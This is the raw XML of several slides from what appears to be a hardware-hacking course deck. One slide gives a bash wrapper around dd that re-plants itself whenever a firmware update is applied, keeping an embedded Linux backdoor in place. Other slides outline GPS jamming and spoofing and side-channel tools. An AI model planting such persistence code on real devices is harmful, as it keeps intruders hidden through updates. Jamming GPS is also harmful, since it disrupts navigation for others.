            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258311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3303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2,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basics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7B98309-3C02-E546-A318-71AA5FDFDB56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937822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38" y="175251"/>
            <a:ext cx="11846282" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Make embedded Linux backdoor persistent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276124" y="1458070"/>
            <a:ext cx="1184628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Example wrapper for DD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>patchmystuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        mv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/bin/dd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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ddd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        cp /bin/dd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/bin/dd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x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/bin/dd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        while [ `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>umount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 echo $?` -ne 0 ]; do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                        sleep 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ddd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=$?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if [[ $@ == *"if=/dev/mmcblk0p10"* ]]; then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        if [[ $@ == *"of=/dev/mmcblk0p9"* ]]; then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                mount /dev/mmcblk0p9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updatetemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp;&gt;/dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">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patchmystuff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>myexit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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E265817B-7399-BD47-B06C-4959E35DDA1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B8D436-B858-9D44-A68F-6E7D6F7616F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244590" y="2514600"/>
            <a:ext cx="2873475" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute dd normally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C636BDA-F4A2-3146-B7FF-FE626068F71E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244590" y="4318055"/>
            <a:ext cx="2873475" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect update</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29075769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30991"/>
            <a:ext cx="1100121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Fingerprint software components and get web info automatically</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2341418"/>
            <a:ext cx="11582400" cy="4161714"/>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software FACT-Core is helpful</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF2CA3E-151D-2047-84A4-4E68386A5C1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1535189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89" y="665546"/>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8,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RF attacks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953096-7A08-FB40-B994-2EF32EF98E4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26152264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34" y="139035"/>
            <a:ext cx="11896386" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Jam a GPS signal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1311215"/>
            <a:ext cx="11211098" cy="5191917"/>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find a general description of GPS at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/GPS_signals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. In the Drone section of these notes, you’ll find a description of the underlying algorithms and procedures.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There are two different attacks: simple jamming and spoofing.</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Jamming</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To jam a GPS signal, just overpower it by transmitting at the same frequencies it uses.  GPS satellites are far away and the signal power at a GPS receiver is small (Calculate it using the information in the SDR section of these notes.)  So a nearby transmitter has a supernatural advantage.</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The original GPS uses two frequencies  1575.42 MHz called L; and 1227.60 MHz, called L2.</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Spoofing</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Spoofing involves transmitting several fake GPS signal that tricks the receiver into miscalculating the location.  This can be done with an SDR.  See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/B44D3R/SDR-GPS-SPOOF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Don’t do either of these things without talking to a lawyer.  It can only be done in a EM isolated environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A95441-4A30-D246-BDAC-EE8E4E7AA55E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17496414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0560" y="7657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Extract information from side channel</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Safe cracking using an oscilloscope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ChipWhisperer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: complete open-source toolchain for side-channel power analysis and glitching attacks.” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://wiki.newae.com/Main_Page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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Processor targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CW303 XMEGA Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Atmel XMEGA 128)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CW304 Notduino Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CW305 Artix FPGA Target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CW308 UFO Target</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B03E1EBA-2A49-5A4B-8C53-ACDE06D0ECE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
